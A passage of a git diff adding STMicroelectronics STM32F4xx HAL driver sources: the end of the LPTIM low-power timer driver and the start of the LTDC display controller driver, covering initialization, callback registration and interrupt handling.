+/** + * @brief Return the LPTIM handle state. + * @param hlptim LPTIM handle + * @retval HAL state + */ +HAL_LPTIM_StateTypeDef HAL_LPTIM_GetState(LPTIM_HandleTypeDef *hlptim) +{ + /* Return LPTIM handle state */ + return hlptim->State; +} + +/** + * @} + */ + + +/** + * @} + */ + +/* Private functions ---------------------------------------------------------*/ + +/** @defgroup LPTIM_Private_Functions LPTIM Private Functions + * @{ + */ +#if (USE_HAL_LPTIM_REGISTER_CALLBACKS == 1) +/** + * @brief Reset interrupt callbacks to the legacy weak callbacks. + * @param lptim pointer to a LPTIM_HandleTypeDef structure that contains + * the configuration information for LPTIM module. + * @retval None + */ +static void LPTIM_ResetCallback(LPTIM_HandleTypeDef *lptim) +{ + /* Reset the LPTIM callback to the legacy weak callbacks */ + lptim->CompareMatchCallback = HAL_LPTIM_CompareMatchCallback; + lptim->AutoReloadMatchCallback = HAL_LPTIM_AutoReloadMatchCallback; + lptim->TriggerCallback = HAL_LPTIM_TriggerCallback; + lptim->CompareWriteCallback = HAL_LPTIM_CompareWriteCallback; + lptim->AutoReloadWriteCallback = HAL_LPTIM_AutoReloadWriteCallback; + lptim->DirectionUpCallback = HAL_LPTIM_DirectionUpCallback; + lptim->DirectionDownCallback = HAL_LPTIM_DirectionDownCallback; +} +#endif /* USE_HAL_LPTIM_REGISTER_CALLBACKS */ + +/** + * @brief LPTimer Wait for flag set + * @param hlptim pointer to a LPTIM_HandleTypeDef structure that contains + * the configuration information for LPTIM module. + * @param flag The lptim flag + * @retval HAL status + */ +static HAL_StatusTypeDef LPTIM_WaitForFlag(LPTIM_HandleTypeDef *hlptim, uint32_t flag) +{ + HAL_StatusTypeDef result = HAL_OK; + uint32_t count = TIMEOUT * (SystemCoreClock / 20UL / 1000UL); + do + { + count--; + if (count == 0UL) + { + result = HAL_TIMEOUT; + } + } while ((!(__HAL_LPTIM_GET_FLAG((hlptim), (flag)))) && (count != 0UL)); + + return result; +} + +/** + * @brief Disable LPTIM HW instance. + * @param hlptim pointer to a LPTIM_HandleTypeDef structure that contains + * the configuration information for LPTIM module. + * @note The following sequence is required to solve LPTIM disable HW limitation. + * Please check Errata Sheet ES0335 for more details under "MCU may remain + * stuck in LPTIM interrupt when entering Stop mode" section. + * @retval None + */ +void LPTIM_Disable(LPTIM_HandleTypeDef *hlptim) +{ + uint32_t tmpclksource = 0; + uint32_t tmpIER; + uint32_t tmpCFGR; + uint32_t tmpCMP; + uint32_t tmpARR; + uint32_t tmpOR; + + __disable_irq(); + + /*********** Save LPTIM Config ***********/ + /* Save LPTIM source clock */ + switch ((uint32_t)hlptim->Instance) + { + case LPTIM1_BASE: + tmpclksource = __HAL_RCC_GET_LPTIM1_SOURCE(); + break; + default: + break; + } + + /* Save LPTIM configuration registers */ + tmpIER = hlptim->Instance->IER; + tmpCFGR = hlptim->Instance->CFGR; + tmpCMP = hlptim->Instance->CMP; + tmpARR = hlptim->Instance->ARR; + tmpOR = hlptim->Instance->OR; + + /*********** Reset LPTIM ***********/ + switch ((uint32_t)hlptim->Instance) + { + case LPTIM1_BASE: + __HAL_RCC_LPTIM1_FORCE_RESET(); + __HAL_RCC_LPTIM1_RELEASE_RESET(); + break; + default: + break; + } + + /*********** Restore LPTIM Config ***********/ + if ((tmpCMP != 0UL) || (tmpARR != 0UL)) + { + /* Force LPTIM source kernel clock from APB */ + switch ((uint32_t)hlptim->Instance) + { + case LPTIM1_BASE: + __HAL_RCC_LPTIM1_CONFIG(RCC_LPTIM1CLKSOURCE_PCLK1); + break; + default: + break; + } + + if (tmpCMP != 0UL) + { + /* Restore CMP register (LPTIM should be enabled first) */ + hlptim->Instance->CR |= LPTIM_CR_ENABLE; + hlptim->Instance->CMP = tmpCMP; + + /* Wait for the completion of the write operation to the LPTIM_CMP register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_CMPOK) == HAL_TIMEOUT) + { + hlptim->State = HAL_LPTIM_STATE_TIMEOUT; + } + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_CMPOK); + } + + if (tmpARR != 0UL) + { + /* Restore ARR register (LPTIM should be enabled first) */ + hlptim->Instance->CR |= LPTIM_CR_ENABLE; + hlptim->Instance->ARR = tmpARR; + + /* Wait for the completion of the write operation to the LPTIM_ARR register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_ARROK) == HAL_TIMEOUT) + { + hlptim->State = HAL_LPTIM_STATE_TIMEOUT; + } + + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARROK); + } + + /* Restore LPTIM source kernel clock */ + switch ((uint32_t)hlptim->Instance) + { + case LPTIM1_BASE: + __HAL_RCC_LPTIM1_CONFIG(tmpclksource); + break; + default: + break; + } + } + + /* Restore configuration registers (LPTIM should be disabled first) */ + hlptim->Instance->CR &= ~(LPTIM_CR_ENABLE); + hlptim->Instance->IER = tmpIER; + hlptim->Instance->CFGR = tmpCFGR; + hlptim->Instance->OR = tmpOR; + + __enable_irq(); +} +/** + * @} + */ +#endif /* LPTIM1 */ + +#endif /* HAL_LPTIM_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_ltdc.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_ltdc.c new file mode 100644 index 000000000..7e4413067 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_ltdc.c @@ -0,0 +1,2163 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_ltdc.c + * @author MCD Application Team + * @brief LTDC HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the LTDC peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + Peripheral State and Errors functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The LTDC HAL driver can be used as follows: + + (#) Declare a LTDC_HandleTypeDef handle structure, for example: LTDC_HandleTypeDef hltdc; + + (#) Initialize the LTDC low level resources by implementing the HAL_LTDC_MspInit() API: + (##) Enable the LTDC interface clock + (##) NVIC configuration if you need to use interrupt process + (+++) Configure the LTDC interrupt priority + (+++) Enable the NVIC LTDC IRQ Channel + + (#) Initialize the required configuration through the following parameters: + the LTDC timing, the horizontal and vertical polarity, the pixel clock polarity, + Data Enable polarity and the LTDC background color value using HAL_LTDC_Init() function + + *** Configuration *** + ========================= + [..] + (#) Program the required configuration through the following parameters: + the pixel format, the blending factors, input alpha value, the window size + and the image size using HAL_LTDC_ConfigLayer() function for foreground + or/and background layer. + + (#) Optionally, configure and enable the CLUT using HAL_LTDC_ConfigCLUT() and + HAL_LTDC_EnableCLUT functions. + + (#) Optionally, enable the Dither using HAL_LTDC_EnableDither(). + + (#) Optionally, configure and enable the Color keying using HAL_LTDC_ConfigColorKeying() + and HAL_LTDC_EnableColorKeying functions. + + (#) Optionally, configure LineInterrupt using HAL_LTDC_ProgramLineEvent() + function + + (#) If needed, reconfigure and change the pixel format value, the alpha value + value, the window size, the window position and the layer start address + for foreground or/and background layer using respectively the following + functions: HAL_LTDC_SetPixelFormat(), HAL_LTDC_SetAlpha(), HAL_LTDC_SetWindowSize(), + HAL_LTDC_SetWindowPosition() and HAL_LTDC_SetAddress(). + + (#) Variant functions with _NoReload suffix allows to set the LTDC configuration/settings without immediate reload. + This is useful in case when the program requires to modify serval LTDC settings (on one or both layers) + then applying(reload) these settings in one shot by calling the function HAL_LTDC_Reload(). + + After calling the _NoReload functions to set different color/format/layer settings, + the program shall call the function HAL_LTDC_Reload() to apply(reload) these settings. + Function HAL_LTDC_Reload() can be called with the parameter ReloadType set to LTDC_RELOAD_IMMEDIATE if + an immediate reload is required. + Function HAL_LTDC_Reload() can be called with the parameter ReloadType set to LTDC_RELOAD_VERTICAL_BLANKING if + the reload should be done in the next vertical blanking period, + this option allows to avoid display flicker by applying the new settings during the vertical blanking period. + + + (#) To control LTDC state you can use the following function: HAL_LTDC_GetState() + + *** LTDC HAL driver macros list *** + ============================================= + [..] + Below the list of most used macros in LTDC HAL driver. + + (+) __HAL_LTDC_ENABLE: Enable the LTDC. + (+) __HAL_LTDC_DISABLE: Disable the LTDC. + (+) __HAL_LTDC_LAYER_ENABLE: Enable an LTDC Layer. + (+) __HAL_LTDC_LAYER_DISABLE: Disable an LTDC Layer. + (+) __HAL_LTDC_RELOAD_IMMEDIATE_CONFIG: Reload Layer Configuration. + (+) __HAL_LTDC_GET_FLAG: Get the LTDC pending flags. + (+) __HAL_LTDC_CLEAR_FLAG: Clear the LTDC pending flags. + (+) __HAL_LTDC_ENABLE_IT: Enable the specified LTDC interrupts. + (+) __HAL_LTDC_DISABLE_IT: Disable the specified LTDC interrupts. + (+) __HAL_LTDC_GET_IT_SOURCE: Check whether the specified LTDC interrupt has occurred or not. + + [..] + (@) You can refer to the LTDC HAL driver header file for more useful macros + + + *** Callback registration *** + ============================================= + [..] + The compilation define USE_HAL_LTDC_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use function HAL_LTDC_RegisterCallback() to register a callback. + + [..] + Function HAL_LTDC_RegisterCallback() allows to register following callbacks: + (+) LineEventCallback : LTDC Line Event Callback. + (+) ReloadEventCallback : LTDC Reload Event Callback. + (+) ErrorCallback : LTDC Error Callback + (+) MspInitCallback : LTDC MspInit. + (+) MspDeInitCallback : LTDC MspDeInit. + [..] + This function takes as parameters the HAL peripheral handle, the callback ID + and a pointer to the user callback function. + + [..] + Use function HAL_LTDC_UnRegisterCallback() to reset a callback to the default + weak function. + HAL_LTDC_UnRegisterCallback() takes as parameters the HAL peripheral handle + and the callback ID. + [..] + This function allows to reset following callbacks: + (+) LineEventCallback : LTDC Line Event Callback + (+) ReloadEventCallback : LTDC Reload Event Callback + (+) ErrorCallback : LTDC Error Callback + (+) MspInitCallback : LTDC MspInit + (+) MspDeInitCallback : LTDC MspDeInit. + + [..] + By default, after the HAL_LTDC_Init and when the state is HAL_LTDC_STATE_RESET + all callbacks are set to the corresponding weak functions: + examples HAL_LTDC_LineEventCallback(), HAL_LTDC_ErrorCallback(). + Exception done for MspInit and MspDeInit functions that are + reset to the legacy weak (surcharged) functions in the HAL_LTDC_Init() and HAL_LTDC_DeInit() + only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the HAL_LTDC_Init() and HAL_LTDC_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand). + + [..] + Callbacks can be registered/unregistered in HAL_LTDC_STATE_READY state only. + Exception done MspInit/MspDeInit that can be registered/unregistered + in HAL_LTDC_STATE_READY or HAL_LTDC_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_LTDC_RegisterCallback() before calling HAL_LTDC_DeInit() + or HAL_LTDC_Init() function. + + [..] + When the compilation define USE_HAL_LTDC_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +#ifdef HAL_LTDC_MODULE_ENABLED + +#if defined (LTDC) + +/** @defgroup LTDC LTDC + * @brief LTDC HAL module driver + * @{ + */ + + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +static void LTDC_SetConfig(LTDC_HandleTypeDef *hltdc, LTDC_LayerCfgTypeDef *pLayerCfg, uint32_t LayerIdx); +/* Private functions ---------------------------------------------------------*/ + +/** @defgroup LTDC_Exported_Functions LTDC Exported Functions + * @{ + */ + +/** @defgroup LTDC_Exported_Functions_Group1 Initialization and Configuration functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and Configuration functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Initialize and configure the LTDC + (+) De-initialize the LTDC + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the LTDC according to the specified parameters in the LTDC_InitTypeDef. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_Init(LTDC_HandleTypeDef *hltdc) +{ + uint32_t tmp, tmp1; + + /* Check the LTDC peripheral state */ + if (hltdc == NULL) + { + return HAL_ERROR; + } + + /* Check function parameters */ + assert_param(IS_LTDC_ALL_INSTANCE(hltdc->Instance)); + assert_param(IS_LTDC_HSYNC(hltdc->Init.HorizontalSync)); + assert_param(IS_LTDC_VSYNC(hltdc->Init.VerticalSync)); + assert_param(IS_LTDC_AHBP(hltdc->Init.AccumulatedHBP)); + assert_param(IS_LTDC_AVBP(hltdc->Init.AccumulatedVBP)); + assert_param(IS_LTDC_AAH(hltdc->Init.AccumulatedActiveH)); + assert_param(IS_LTDC_AAW(hltdc->Init.AccumulatedActiveW)); + assert_param(IS_LTDC_TOTALH(hltdc->Init.TotalHeigh)); + assert_param(IS_LTDC_TOTALW(hltdc->Init.TotalWidth)); + assert_param(IS_LTDC_HSPOL(hltdc->Init.HSPolarity)); + assert_param(IS_LTDC_VSPOL(hltdc->Init.VSPolarity)); + assert_param(IS_LTDC_DEPOL(hltdc->Init.DEPolarity)); + assert_param(IS_LTDC_PCPOL(hltdc->Init.PCPolarity)); + +#if (USE_HAL_LTDC_REGISTER_CALLBACKS == 1) + if (hltdc->State == HAL_LTDC_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hltdc->Lock = HAL_UNLOCKED; + + /* Reset the LTDC callback to the legacy weak callbacks */ + hltdc->LineEventCallback = HAL_LTDC_LineEventCallback; /* Legacy weak LineEventCallback */ + hltdc->ReloadEventCallback = HAL_LTDC_ReloadEventCallback; /* Legacy weak ReloadEventCallback */ + hltdc->ErrorCallback = HAL_LTDC_ErrorCallback; /* Legacy weak ErrorCallback */ + + if (hltdc->MspInitCallback == NULL) + { + hltdc->MspInitCallback = HAL_LTDC_MspInit; + } + /* Init the low level hardware */ + hltdc->MspInitCallback(hltdc); + } +#else + if (hltdc->State == HAL_LTDC_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hltdc->Lock = HAL_UNLOCKED; + /* Init the low level hardware */ + HAL_LTDC_MspInit(hltdc); + } +#endif /* USE_HAL_LTDC_REGISTER_CALLBACKS */ + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Configure the HS, VS, DE and PC polarity */ + hltdc->Instance->GCR &= ~(LTDC_GCR_HSPOL | LTDC_GCR_VSPOL | LTDC_GCR_DEPOL | LTDC_GCR_PCPOL); + hltdc->Instance->GCR |= (uint32_t)(hltdc->Init.HSPolarity | hltdc->Init.VSPolarity | \ + hltdc->Init.DEPolarity | hltdc->Init.PCPolarity); + + /* Set Synchronization size */ + hltdc->Instance->SSCR &= ~(LTDC_SSCR_VSH | LTDC_SSCR_HSW); + tmp = (hltdc->Init.HorizontalSync << 16U); + hltdc->Instance->SSCR |= (tmp | hltdc->Init.VerticalSync); + + /* Set Accumulated Back porch */ + hltdc->Instance->BPCR &= ~(LTDC_BPCR_AVBP | LTDC_BPCR_AHBP); + tmp = (hltdc->Init.AccumulatedHBP << 16U); + hltdc->Instance->BPCR |= (tmp | hltdc->Init.AccumulatedVBP); + + /* Set Accumulated Active Width */ + hltdc->Instance->AWCR &= ~(LTDC_AWCR_AAH | LTDC_AWCR_AAW); + tmp = (hltdc->Init.AccumulatedActiveW << 16U); + hltdc->Instance->AWCR |= (tmp | hltdc->Init.AccumulatedActiveH); + + /* Set Total Width */ + hltdc->Instance->TWCR &= ~(LTDC_TWCR_TOTALH | LTDC_TWCR_TOTALW); + tmp = (hltdc->Init.TotalWidth << 16U); + hltdc->Instance->TWCR |= (tmp | hltdc->Init.TotalHeigh); + + /* Set the background color value */ + tmp = ((uint32_t)(hltdc->Init.Backcolor.Green) << 8U); + tmp1 = ((uint32_t)(hltdc->Init.Backcolor.Red) << 16U); + hltdc->Instance->BCCR &= ~(LTDC_BCCR_BCBLUE | LTDC_BCCR_BCGREEN | LTDC_BCCR_BCRED); + hltdc->Instance->BCCR |= (tmp1 | tmp | hltdc->Init.Backcolor.Blue); + + /* Enable the Transfer Error and FIFO underrun interrupts */ + __HAL_LTDC_ENABLE_IT(hltdc, LTDC_IT_TE | LTDC_IT_FU); + + /* Enable LTDC by setting LTDCEN bit */ + __HAL_LTDC_ENABLE(hltdc); + + /* Initialize the error code */ + hltdc->ErrorCode = HAL_LTDC_ERROR_NONE; + + /* Initialize the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + return HAL_OK; +} + +/** + * @brief De-initialize the LTDC peripheral. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @retval None + */ + +HAL_StatusTypeDef HAL_LTDC_DeInit(LTDC_HandleTypeDef *hltdc) +{ +#if (USE_HAL_LTDC_REGISTER_CALLBACKS == 1) + if (hltdc->MspDeInitCallback == NULL) + { + hltdc->MspDeInitCallback = HAL_LTDC_MspDeInit; + } + /* DeInit the low level hardware */ + hltdc->MspDeInitCallback(hltdc); +#else + /* DeInit the low level hardware */ + HAL_LTDC_MspDeInit(hltdc); +#endif /* USE_HAL_LTDC_REGISTER_CALLBACKS */ + + /* Initialize the error code */ + hltdc->ErrorCode = HAL_LTDC_ERROR_NONE; + + /* Initialize the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Initialize the LTDC MSP. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @retval None + */ +__weak void HAL_LTDC_MspInit(LTDC_HandleTypeDef *hltdc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hltdc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_LTDC_MspInit could be implemented in the user file + */ +} + +/** + * @brief De-initialize the LTDC MSP. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @retval None + */ +__weak void HAL_LTDC_MspDeInit(LTDC_HandleTypeDef *hltdc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hltdc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_LTDC_MspDeInit could be implemented in the user file + */ +} + +#if (USE_HAL_LTDC_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User LTDC Callback + * To be used instead of the weak predefined callback + * @param hltdc ltdc handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_LTDC_LINE_EVENT_CB_ID Line Event Callback ID + * @arg @ref HAL_LTDC_RELOAD_EVENT_CB_ID Reload Event Callback ID + * @arg @ref HAL_LTDC_ERROR_CB_ID Error Callback ID + * @arg @ref HAL_LTDC_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_LTDC_MSPDEINIT_CB_ID MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_LTDC_RegisterCallback(LTDC_HandleTypeDef *hltdc, HAL_LTDC_CallbackIDTypeDef CallbackID, pLTDC_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hltdc->ErrorCode |= HAL_LTDC_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hltdc); + + if (hltdc->State == HAL_LTDC_STATE_READY) + { + switch (CallbackID) + { + case HAL_LTDC_LINE_EVENT_CB_ID : + hltdc->LineEventCallback = pCallback; + break; + + case HAL_LTDC_RELOAD_EVENT_CB_ID : + hltdc->ReloadEventCallback = pCallback; + break; + + case HAL_LTDC_ERROR_CB_ID : + hltdc->ErrorCallback = pCallback; + break; + + case HAL_LTDC_MSPINIT_CB_ID : + hltdc->MspInitCallback = pCallback; + break; + + case HAL_LTDC_MSPDEINIT_CB_ID : + hltdc->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hltdc->ErrorCode |= HAL_LTDC_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hltdc->State == HAL_LTDC_STATE_RESET) + { + switch (CallbackID) + { + case HAL_LTDC_MSPINIT_CB_ID : + hltdc->MspInitCallback = pCallback; + break; + + case HAL_LTDC_MSPDEINIT_CB_ID : + hltdc->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hltdc->ErrorCode |= HAL_LTDC_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hltdc->ErrorCode |= HAL_LTDC_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hltdc); + + return status; +} + +/** + * @brief Unregister an LTDC Callback + * LTDC callabck is redirected to the weak predefined callback + * @param hltdc ltdc handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_LTDC_LINE_EVENT_CB_ID Line Event Callback ID + * @arg @ref HAL_LTDC_RELOAD_EVENT_CB_ID Reload Event Callback ID + * @arg @ref HAL_LTDC_ERROR_CB_ID Error Callback ID + * @arg @ref HAL_LTDC_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_LTDC_MSPDEINIT_CB_ID MspDeInit callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_LTDC_UnRegisterCallback(LTDC_HandleTypeDef *hltdc, HAL_LTDC_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hltdc); + + if (hltdc->State == HAL_LTDC_STATE_READY) + { + switch (CallbackID) + { + case HAL_LTDC_LINE_EVENT_CB_ID : + hltdc->LineEventCallback = HAL_LTDC_LineEventCallback; /* Legacy weak LineEventCallback */ + break; + + case HAL_LTDC_RELOAD_EVENT_CB_ID : + hltdc->ReloadEventCallback = HAL_LTDC_ReloadEventCallback; /* Legacy weak ReloadEventCallback */ + break; + + case HAL_LTDC_ERROR_CB_ID : + hltdc->ErrorCallback = HAL_LTDC_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_LTDC_MSPINIT_CB_ID : + hltdc->MspInitCallback = HAL_LTDC_MspInit; /* Legcay weak MspInit Callback */ + break; + + case HAL_LTDC_MSPDEINIT_CB_ID : + hltdc->MspDeInitCallback = HAL_LTDC_MspDeInit; /* Legcay weak MspDeInit Callback */ + break; + + default : + /* Update the error code */ + hltdc->ErrorCode |= HAL_LTDC_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hltdc->State == HAL_LTDC_STATE_RESET) + { + switch (CallbackID) + { + case HAL_LTDC_MSPINIT_CB_ID : + hltdc->MspInitCallback = HAL_LTDC_MspInit; /* Legcay weak MspInit Callback */ + break; + + case HAL_LTDC_MSPDEINIT_CB_ID : + hltdc->MspDeInitCallback = HAL_LTDC_MspDeInit; /* Legcay weak MspDeInit Callback */ + break; + + default : + /* Update the error code */ + hltdc->ErrorCode |= HAL_LTDC_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hltdc->ErrorCode |= HAL_LTDC_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hltdc); + + return status; +} +#endif /* USE_HAL_LTDC_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup LTDC_Exported_Functions_Group2 IO operation functions + * @brief IO operation functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] This section provides function allowing to: + (+) Handle LTDC interrupt request + +@endverbatim + * @{ + */ +/** + * @brief Handle LTDC interrupt request. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @retval HAL status + */ +void HAL_LTDC_IRQHandler(LTDC_HandleTypeDef *hltdc) +{ + uint32_t isrflags = READ_REG(hltdc->Instance->ISR); + uint32_t itsources = READ_REG(hltdc->Instance->IER); + + /* Transfer Error Interrupt management ***************************************/ + if (((isrflags & LTDC_ISR_TERRIF) != 0U) && ((itsources & LTDC_IER_TERRIE) != 0U)) + { + /* Disable the transfer Error interrupt */ + __HAL_LTDC_DISABLE_IT(hltdc, LTDC_IT_TE); + + /* Clear the transfer error flag */ + __HAL_LTDC_CLEAR_FLAG(hltdc, LTDC_FLAG_TE); + + /* Update error code */ + hltdc->ErrorCode |= HAL_LTDC_ERROR_TE; + + /* Change LTDC state */ + hltdc->State = HAL_LTDC_STATE_ERROR; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + /* Transfer error Callback */ +#if (USE_HAL_LTDC_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + hltdc->ErrorCallback(hltdc); +#else + /* Call legacy error callback*/ + HAL_LTDC_ErrorCallback(hltdc); +#endif /* USE_HAL_LTDC_REGISTER_CALLBACKS */ + } + + /* FIFO underrun Interrupt management ***************************************/ + if (((isrflags & LTDC_ISR_FUIF) != 0U) && ((itsources & LTDC_IER_FUIE) != 0U)) + { + /* Disable the FIFO underrun interrupt */ + __HAL_LTDC_DISABLE_IT(hltdc, LTDC_IT_FU); + + /* Clear the FIFO underrun flag */ + __HAL_LTDC_CLEAR_FLAG(hltdc, LTDC_FLAG_FU); + + /* Update error code */ + hltdc->ErrorCode |= HAL_LTDC_ERROR_FU; + + /* Change LTDC state */ + hltdc->State = HAL_LTDC_STATE_ERROR; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + /* Transfer error Callback */ +#if (USE_HAL_LTDC_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + hltdc->ErrorCallback(hltdc); +#else + /* Call legacy error callback*/ + HAL_LTDC_ErrorCallback(hltdc); +#endif /* USE_HAL_LTDC_REGISTER_CALLBACKS */ + } + + /* Line Interrupt management ************************************************/ + if (((isrflags & LTDC_ISR_LIF) != 0U) && ((itsources & LTDC_IER_LIE) != 0U)) + { + /* Disable the Line interrupt */ + __HAL_LTDC_DISABLE_IT(hltdc, LTDC_IT_LI); + + /* Clear the Line interrupt flag */ + __HAL_LTDC_CLEAR_FLAG(hltdc, LTDC_FLAG_LI); + + /* Change LTDC state */ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + /* Line interrupt Callback */ +#if (USE_HAL_LTDC_REGISTER_CALLBACKS == 1) + /*Call registered Line Event callback */ + hltdc->LineEventCallback(hltdc); +#else + /*Call Legacy Line Event callback */ + HAL_LTDC_LineEventCallback(hltdc); +#endif /* USE_HAL_LTDC_REGISTER_CALLBACKS */ + } + + /* Register reload Interrupt management ***************************************/ + if (((isrflags & LTDC_ISR_RRIF) != 0U) && ((itsources & LTDC_IER_RRIE) != 0U)) + { + /* Disable the register reload interrupt */ + __HAL_LTDC_DISABLE_IT(hltdc, LTDC_IT_RR); + + /* Clear the register reload flag */ + __HAL_LTDC_CLEAR_FLAG(hltdc, LTDC_FLAG_RR); + + /* Change LTDC state */ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + /* Reload interrupt Callback */ +#if (USE_HAL_LTDC_REGISTER_CALLBACKS == 1) + /*Call registered reload Event callback */ + hltdc->ReloadEventCallback(hltdc); +#else + /*Call Legacy Reload Event callback */ + HAL_LTDC_ReloadEventCallback(hltdc); +#endif /* USE_HAL_LTDC_REGISTER_CALLBACKS */ + } +} + +/** + * @brief Error LTDC callback. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @retval None + */ +__weak void HAL_LTDC_ErrorCallback(LTDC_HandleTypeDef *hltdc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hltdc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_LTDC_ErrorCallback could be implemented in the user file + */ +} + +/** + * @brief Line Event callback. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @retval None + */ +__weak void HAL_LTDC_LineEventCallback(LTDC_HandleTypeDef *hltdc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hltdc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_LTDC_LineEventCallback could be implemented in the user file + */ +} + +/** + * @brief Reload Event callback. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @retval None + */ +__weak void HAL_LTDC_ReloadEventCallback(LTDC_HandleTypeDef *hltdc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hltdc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_LTDC_ReloadEvenCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup LTDC_Exported_Functions_Group3 Peripheral Control functions + * @brief Peripheral Control functions + * +@verbatim + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Configure the LTDC foreground or/and background parameters. + (+) Set the active 